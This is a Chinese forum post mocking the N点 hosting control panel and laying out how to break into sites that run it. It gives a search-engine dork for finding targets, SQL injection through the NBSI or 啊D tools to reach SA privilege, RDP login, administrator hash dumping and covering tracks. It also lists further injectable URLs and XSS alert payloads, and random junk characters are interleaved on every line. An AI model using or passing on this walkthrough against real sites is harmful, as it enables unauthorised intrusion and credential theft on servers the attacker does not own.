不得不说N点实在是一个破东西
$ V l0 W( a/ R; }( ` ]% w就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
: S; Z, F% u. L& l) w) n好吧 抱怨一下就行了 接下来关键的时候到了
' m% L0 X U- H; |# ?4 C首先百度搜索关键字:inurl: (mmdatabase.asp)
$ H6 I" @" q5 E9 _# h8 e我随便列举一个: www.xxxx.com
4 P% a4 d7 \ X$ {, B6 A g/ }修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
; ^0 f& z2 Y3 }扔入NBSI 或者啊D等各种傻逼工具后# K/ h H7 i: x7 l7 q5 M
你们会看到是SA权限
% b' s2 B5 S2 t. ]' I _果断3389 上去 hash得到administrator密码0 [5 G u. w7 F
擦屁股走人~
3 n0 F( ~3 O3 ]) ^$ T6 F! j: q经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
& c) j. Z% f. f 1 C9 i) F, z3 k7 C! }
再附上其他几个漏洞页面
! C9 C4 ?4 v0 w. R& b* l( xSQL:( Q( I; O; T- R" h
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
7 w+ v7 Z4 F$ d! e- o2 c' O) H! Lhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
- U$ N# ^) g& l1 T4 E9 t& Xhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9$ ?6 p; |1 G: R' N
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
" U3 ^$ L: r( a* IXSS证明:! ], h, P1 t7 ?! k
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”* N, M+ g @! O" E
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
. u+ y; N& R2 S o: q3 ]http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script> B" a" H$ V; c% |4 u
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
( u# c( M" X* z% f. m; ]- p- l, M% z5 T还是星外吧 你们懂的; A0 }' v, e6 M+ U0 F) U" j V
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
& g b" P* I- B8 ~" E5 `# |5 G+ nPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉6 b6 T$ `! ~% L2 S+ q
——- |